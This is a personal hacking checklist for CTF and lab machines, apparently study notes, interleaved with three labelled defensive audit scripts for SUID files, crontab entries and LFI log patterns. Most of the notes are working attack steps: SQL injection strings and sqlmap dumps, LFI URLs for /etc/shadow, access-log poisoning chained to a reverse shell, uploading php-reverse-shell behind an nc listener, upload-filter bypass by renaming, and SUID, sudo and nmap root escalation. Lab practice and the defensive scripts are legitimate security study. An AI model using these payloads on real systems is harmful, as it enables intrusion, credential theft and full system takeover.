Begun 16 March, 2021

Hack checklist:
- Search for SUID bits set on binaries you can execute as root for priv escalation.
- Search for id_rsa, private certs with which you can escalate privileges.
- Scan robots, dirb directories, html/php source code for usernames or passwords or base64 strings you can decode.
- Add some of these to a script you can paste into a system to find recursively for such SUID files and certs or other.
- Be alert for potential usernames anywhere, base64 encoded strings, robots, html/php/other code strings. Usernames!
- Try ssh-ing/ftp-ing into boxes with found usernames and potential passwords, or hydra the services for brute force access.
- You can ssh back into a box with private keys (id_rsa), root at best.
- uname -a to see if the local system is vulnerable. Download exploit, compile and execute for local uid0.
- searchsploit [keyword] to find vulns, or search CVEs or exploithub or wherever. Use against local or remote.
- nc -lvp 4444 to set up an nc listener for the target to connect back to you on, as with a python reverse shell.
- Check /tmp for fishiness. Stuff gets placed there by attackers b/c it's world writeable.
- If you're ssh-ed in, paste linenum.sh into the box and run it to gather local intel. Great tool.
- Check /etc/crontab to see what processes are running out of the ordinary. Can contain passwords in scripts set to run.
- Swap out (if possible) scripts which run as root from crontab with your own, like add you to gid0 or create a new account with creds you set.
- You can call into a server with bad php: http://192.168.175.72:8593/?book=../../../../../var/log/apache2/access.log or error.log
- Entries in /etc/crontab can be hidden from view depending on crlf or end of line entry. Reveal by pasting into vi or other editor.
- Check gobuster.out for interesting hidden directories or filenames, like /secret or whatever.
- Always try default credentials like admin/admin, root/toor etc.
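The recursive finder the checklist asks for, written here as an added audit script (it is not from the original notes): it lists SUID/SGID files under a tree, diffs them against a baseline of SUID binaries expected on the host, and reports private-key files readable by group or other. The baseline entries, the key file names searched for and the script's argument handling are assumptions; on a real host it is run against /, and the usage comment shows how.

```sh
#!/bin/sh
# Added example, not from the original notes: audit a tree for SUID/SGID
# binaries and private keys exposed to other users. Defaults are assumptions.

# Constructed baseline of SUID binaries expected on this host. On a real
# system, generate it once from a clean install and keep it under change control.
SUID_BASELINE="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su"

# List SUID and SGID regular files under ROOT (default /), one path per line.
list_setuid() {
  find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Print SUID/SGID files not present in the baseline. Paths are compared with
# the audited root stripped, so a test tree such as /tmp/x/usr/bin/passwd is
# matched against the baseline entry /usr/bin/passwd.
unexpected_setuid() {
  root="${1:-/}"; root="${root%/}"          # "/" becomes "" so nothing is stripped
  list_setuid "${root:-/}" | while IFS= read -r f; do
    rel="${f#"$root"}"
    printf '%s\n' "$SUID_BASELINE" | grep -qxF -- "$rel" || printf '%s\n' "$f"
  done
}

# Print private-key files (matched by name, then confirmed by the PEM header)
# that are readable by group or other. Those are the ones to chmod 600 first.
find_exposed_keys() {
  find "${1:-/}" -xdev -type f \
       \( -name 'id_rsa' -o -name 'id_dsa' -o -name 'id_ecdsa' -o -name 'id_ed25519' \
          -o -name '*.pem' -o -name '*.key' \) \
       -perm /044 -print 2>/dev/null \
  | while IFS= read -r f; do
      grep -q 'PRIVATE KEY' "$f" 2>/dev/null && printf '%s\n' "$f"
    done | sort
}

# Usage: sh suid_audit.sh /        (no argument: define the functions only)
if [ "$#" -gt 0 ]; then
  echo "== SUID/SGID files not in baseline =="; unexpected_setuid "$1"
  echo "== private keys readable by group/other =="; find_exposed_keys "$1"
fi
```

The baseline diff is what makes the output useful on a defender's side: a plain SUID listing on a stock distribution has dozens of entries, but anything that is not in the baseline (a copied shell with chmod +s, for instance) is a one-line answer.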
- Or Google for default creds for the software you're seeing.
- Try eliciting a SQL vuln with: ' or 1=1; -- or http://192.168.120.224/store/book.php?bookisbn=%27%20or%201=1;%20--
- .php files let you add strings onto the end of URLs for command injection, like cat /etc/shadow, and if the web service is running as root, it works.
- Try sqlmap -u http://1.2.3.4/secret.php?number= --dump-all --batch -D store (store being the database).
- Connect with mysql or do password guessing with hydra or medusa.
- show databases; show tables; select * from X; (X being that table). Find the pass database for hashes to crack with john or crackstation.
- LFI - Local File Include is where we somehow upload files then call them, and they get executed with the privs of the web service account, like apache.
- Like: $ cp /usr/share/webshells/php/php-reverse-shell.php . Edit with your ip/open port and run the reverse php shell and it connects back to you.
- If you try to get the robots.txt file and it says no b/c you're not a search engine, curl supports declaring your browser string to be a permitted search engine.
- find / | grep pass to search the entire system for password files or similar. Pivot!
- Don't forget to pivot to other boxes on the remote network, if it exists.
- In metasploit, searchsploit to find exploit, then $ cp /usr/share/exploitdb/platform/windows/remote/3996.c /root/3996.c. Compile and run.
- $ sudo -l to enumerate what the user is able to do on an ssh term. sudo -l lists paths with potential suid bits set to run with root privs.
- /usr/bin/time /bin/sh for priv escalation.
- Maybe script a bunch of those to execute to attempt priv escalation.
- Using a SUID binary, try:
  LFILE=/etc/shadow
  sudo /usr/bin/SUID-BINARY --raw -F "$LFILE"
  Responds "Failed to resolve host" yet still dumps /etc/shadow for cracking.
- dirb http://192.168.0.27 -X .zip (find files with this eXtension)
- LFI with http://192.168.120.170/console/file.php?file=/etc/passwd or shadow
- Dirb can reveal useful php or directories for these LFI attempts.
- View for poisoning auth.log: 192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
- ssh ''@192.168.120.170 (see how that tacks some command injection string into the ssh command)
- Navigating to manipulated URLs can cause the web server to execute files you uploaded in the LFI and reconnect back to you for a remote shell.
- Check your privileges, whatever they are. If you can compromise a seemingly unprivileged account, you may have access to things like services or ?
- $ sudo -l (list privs). Responds with "you may run the following commands".
- If your shell seems constricted by chroot or you have no path statements, you can use absolutes like /usr/bin/ls or make path statements.
- Escalation: you can pipe scripts into binaries, including nmap, to get /bin/sh. For example:
  TF=$(mktemp)
  echo 'os.execute("/bin/sh")' > $TF
  sudo -u root nmap --script=$TF
  This executes the shell with the root privs you got from nmap.
- If you're in a restricted shell, try $ bash --noprofile. Seems to clear that up.

Misc Linux Hacknotes:
- /etc/passwd can actually contain hashes. Crack when found.
- gobuster or dirb to brute force hidden directories or objects. Good for finding web objects for uploading files for remote code execution.
- wordlists on kali are stored in /usr/share/wordlists/
- start netcat listener with # nc -nvlp [port], usage # nc -nvlp 4444
- Kali stores webshells here: /usr/share/webshells. Notably, php-reverse-shell.php.
- Edit the top 10 lines for usage.
- When guessing passwords, try the username as a pass, or use cewl to augment wordlists for hydra brute forcing.
- Use apt list --installed to see what's installed in debian.
- Use the stat command to view extended file info.
- You can hide /etc/crontab services with an eol/crlf character. View hidden ones with $ hexeditor.
- Use dpkg --list to view installed apps.
- tail -f /var/log/syslog shows repeated errors with the expressvpn.service daemon: /etc/systemd/system/expressvpn.service
  # systemctl stop expressvpn.service seems to have killed it.
  # systemctl disable expressvpn.service
  Response: Removed /etc/systemd/system/multi-user.target.wants/expressvpn.service
  Errors in /var/log/syslog for expressvpn ended.
  systemctl status expressvpn.service
- Imagine a captcha is stopping you from logging in: view source, find captcha.php, and sometimes the value is in the source code. Duh.
- git clone http://github.com/openwall/john would copy JTR to your local machine. From there, cd into john/src, ./configure, make, make install. Didn't seem to run right but that's how you do that. Didn't put anything into my path to execute though.
- zip2john is a password cracker for zip files. Don't have to brute force those.
- In /etc/passwd a default shell of /bin/rbash means restricted bash. You'd have to escape that, but you can run software outside your path so that will be easy.
- Try ssh username@1.2.3.4 -t "bash --noprofile" and try using full paths to binaries like /usr/bin/cat or whatever (worked).
- Get attackable VMs from: https://www.vulnhub.com/
- You can 'strings' binaries looking for ASCII characters to gather intel about the file.
- $ ls -al /tmp to see what's going on in there.
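As an added defender-side check (not from the original notes), these shell functions cover the two crontab tricks noted above: the first reports crontab lines carrying control characters such as a carriage return, which hide part of an entry from a plain cat, and the second lists commands in a system crontab whose script file is writable by group or other, i.e. the ones any local user could swap out. The assumed layout is the /etc/crontab format (five time fields, a user, then the command); the file name and usage handling are assumptions too.

```sh
#!/bin/sh
# Added example, not from the original notes: spot hidden and hijackable
# entries in a system crontab file. Assumes /etc/crontab layout.

# Count lines that contain bytes outside printable ASCII, space and tab:
# carriage return (\r), escape, backspace and the like. LC_ALL=C makes the
# classes byte-wise so a UTF-8 locale cannot mask anything.
crontab_hidden_count() {
  LC_ALL=C grep -c '[^[:print:][:blank:]]' "$1"
}

# Show the offending lines with line numbers; sed's l command renders control
# characters unambiguously (\r, \033, ...), so nothing stays invisible.
crontab_hidden_lines() {
  LC_ALL=C grep -n '[^[:print:][:blank:]]' "$1" | sed -n 'l'
}

# Print each command path from the crontab whose file is writable by group or
# other. Comments, blank lines and VAR=value lines are skipped; the command is
# field 7 for time-spec lines and field 3 for @reboot/@daily style lines.
crontab_writable_targets() {
  grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' -e '^[A-Za-z_][A-Za-z0-9_]*=' "$1" \
  | awk '$1 ~ /^@/ { print $3; next } { print $7 }' \
  | while IFS= read -r cmd; do
      case "$cmd" in
        /*) [ -f "$cmd" ] && [ -n "$(find "$cmd" -perm /022 -print 2>/dev/null)" ] \
              && printf '%s\n' "$cmd" ;;
      esac
    done | sort -u
}

# Usage: sh crontab_check.sh /etc/crontab   (no argument: define the functions only)
if [ "$#" -gt 0 ]; then
  echo "== lines with control characters =="; crontab_hidden_lines "$1"
  echo "== commands whose script is group/other-writable =="; crontab_writable_targets "$1"
fi
```

The writable-target check only looks at the first word of the command; an entry that runs an interpreter on a script (sh /some/script.sh) would need the second word checked as well, which is a one-line extension of the awk step.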
- Got a base64 string from a tmp file I opened.
- # chkrootkit to check for rootkit activity or evidence.
- responder.py listens on the local network for LLMNR (Link-Local Multicast Name Resolution) broadcasts and gathers up hashes for local cracking and reuse.
- Search for vulns in metasploit. Example: msf > use auxiliary/admin/http/wp_google_maps_sqli
- Check for ability to upload and execute files via url like http://1.2.3.3/upload_dir/exploit.php
- If TCP/3306 is open, it's MySQL. You can connect with # mysql -u root -p -h 1.2.3.3 and dig for usernames/passes.
- Base64 encoding: if you see a string of text like 'Sld6WHVCSkpOeQ==', it may be base64 encoded: echo 'Sld6WHVCSkpOeQ==' | base64 -d (or --decode)
- Sometimes passwords are hidden in plain sight.
- Other times, a pass hash looks like $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1. Save to hashfile.txt and $ john hashfile.txt to crack it.
- If you find passes anywhere, try logging in anywhere with them to escalate privileges.
- In an ls command, check file ownership for usernames, or /etc/passwd or /home/username.
- Make copies of files while you have a root shell and chmod 666 them so you don't lose access.
- LFI - Local File Include: http://192.168.120.45/?page=php://filter/convert.base64-encode/resource=config
  This says "hey server, open this file I have." More on offensive-security.com. Study.
- Practice on DVWA.
- Check all web content to which you have access. One VM had admin credentials in cleartext.
- If you're restricted to uploading file types like only .jpg or .png, simply rename a .php to .jpg to upload and execute for reverse shell.
- Search metasploit for specific version numbers of software to attack.
- Searchsploit can be used for the same search.
- Once discovered:
  msf > nmap -Pn -sS -A -oX target_db 1.2.3.0/24 (or 1.2.3.4)
  msf > db_import target_db
  msf > hosts (to view hosts in the target_db)
  msf > db_nmap -sSV -A 1.2.3.4 (targets from target_db)
- If you find a place to upload files, upload php reverse shells, then call them via URL:
  First, start the reverse shell listener with netcat: # nc -lvp 4444 (any IP on 4444)
  Some VMs have file upload ability, then call via web browser: http://192.168.120.30/uploaded_files/php-reverse-shell.php (calls the script you uploaded)
  Webshells are stored in /usr/share/webshells, notably php-reverse-shell.php.
  Once you run the shell on the webserver, it connects back, then escalate privs.
- find / | grep txt or root or flag or whatever file anywhere on the filesystem.
- Navigating to http://192.168.120.30/flag/ can grant a flag.
- msf > search CVE:2008:9798 shows you the exploit. Select with the number next to it, like msf > use 0
- Regex to find a valid IP address: \b(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}\b
- amap can find services running on non-standard ports. E.g., when ssh is running on tcp/655335.
- More on Kali MiniBox puter.
- Format nikto output for msf import and use: # nikto -h 1.2.3.4 -Format msf+
- Binaries with the S bit set (# chmod +s /bin/bash) are executed with root privs so that (!) $ bash -p results in uid0 (root).
- nmap -T4 --top-ports 5000 1.2.3.4 (scan top 5000 ports)
- $ openssl passwd -1 -salt hack pass123
  $1$hack$22.CgYt2uMolqeatCk9ih/
- zip2john is hugely faster than fcrackzip, massively.
- sqlmap.py -u "http://www.site.com/section.php?id=51" == test to see if vuln to injection
- sqlmap -u http://192.168.75.72/index.php
- Searchsploit searches exploit-db for sploits from a cmdline. Isn't related to msf>.
- echo "GET HTTP/1.1" | nc 192.168.189.72 80 - dumps.
- Poison the webserver logs with script, then call the access.log with curl! wow!
- $ echo "GET HTTP/1.1" | nc 192.168.175.72 80
  First, start our listener with # nc -nvlp 444.
  Then trigger it with the LFI: $ curl http://192.168.175.72:8593?book=../../../../../var/log/apache2/access.log
  We receive our shell.
- If you have shell on a box, check permissions on web files to see if you have write access to something like index.php. Change it to escalate privs.
- If you can't find the flag, do a # find / | grep \.txt and sort by date to find a recently-edited text file flag. dafe5f0c961a70c32fd1721cb99c7771
- If a site you're working on calls out to a non-existent domain, you can put an entry back to you in /etc/hosts so the site works. Worked on Proving Grounds Loly.
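The LFI and log-poisoning sequence above leaves a recognisable trail in the web server's own access log, so as an added example (not from the original notes) here is detection logic run over constructed Apache-style log lines: it flags plain and percent-encoded directory traversal, PHP stream wrappers in a parameter, and a PHP open tag anywhere in a logged request, then tallies hits per client IP. The sample log, IPs, dates and paths are all made up for the example.

```sh
#!/bin/sh
# Added example, not from the original notes: detection over Apache-style
# access-log lines for the LFI and log-poisoning patterns noted above.

# Constructed sample log (not real traffic). Dates, IPs and paths are made up;
# the requests mirror the shapes discussed in the notes.
SAMPLE_LOG='10.0.0.5 - - [16/Mar/2021:10:00:01 +0000] "GET /store/book.php?bookisbn=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Mar/2021:10:00:07 +0000] "GET /?book=../../../../../var/log/apache2/access.log HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Mar/2021:10:00:09 +0000] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Mar/2021:10:00:12 +0000] "GET /<?php echo 1; ?> HTTP/1.1" 404 300 "-" "-"
10.0.0.9 - - [16/Mar/2021:10:00:15 +0000] "GET /console/file.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1700 "-" "curl/7.74"
10.0.0.6 - - [16/Mar/2021:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 4100 "-" "Mozilla/5.0"'

# Print log lines that carry an LFI or poisoning indicator: plain or
# percent-encoded directory traversal, a PHP stream wrapper in a parameter,
# or a PHP open tag anywhere in the line (request path, referer or user-agent,
# which is how a log file gets turned into executable PHP).
# Reads the files given as arguments, or stdin when there are none.
lfi_indicators() {
  grep -i -E \
       -e '(\.\./|\.\.%2f|%2e%2e/|%2e%2e%2f)' \
       -e '(php|data|expect|phar|zip)://' \
       -e '<\?php' "$@"
}

# Tally indicator hits per client IP (first field), busiest first: a single
# IP walking through traversal, wrappers and a PHP tag is the triage signal.
lfi_hits_by_ip() {
  lfi_indicators "$@" | awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Usage: sh lfi_detect.sh /var/log/apache2/access.log
#        (no argument: run against the constructed sample above)
if [ "$#" -gt 0 ]; then
  lfi_hits_by_ip "$@"
else
  printf '%s\n' "$SAMPLE_LOG" | lfi_hits_by_ip
fi
```

Run against the sample it reports 4 10.0.0.9: the benign book.php request from 10.0.0.5 contains "php" but neither a wrapper nor an open tag, so it is not flagged. The same grep, scheduled over the live access.log, is the cheapest alert for the log-poisoning technique the notes describe.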